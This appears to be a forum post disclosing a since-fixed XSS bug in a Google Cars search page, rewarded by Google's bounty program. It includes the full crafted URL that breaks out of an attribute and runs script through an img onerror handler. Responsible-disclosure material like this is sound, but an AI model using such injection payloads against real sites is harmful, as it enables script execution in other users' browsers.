(adsbygoogle = window.adsbygoogle || []).push({}); Hey guys just wanted to share a POC thread for an xss vuln on Google. This has been confirmed fixed by a Google security engineer.

The vulnerable link was

    https://www.google.com/cars/#!search&Make_S=Acura"><img src="<img src=search"/onerror=alert("XSS")//">&Zipcode_S=94501&User+Distance_D=25&start=0&tab=dealer&tknid=2134870870

Basically, Acura was a string selected from a drop down bar, it was incorrectly sanitized and closing it off and including your own piece of javascript/html would get executed.

Here's a POC video I made when I found it.



Google wired me $1337, and a spot on their "Reward Recipients" Hall of fame list

Good luck and if you have any questions let me know!

Nice find dude! If you know what you're doing when finding exploits, I'm sure that's some easy money for you. :p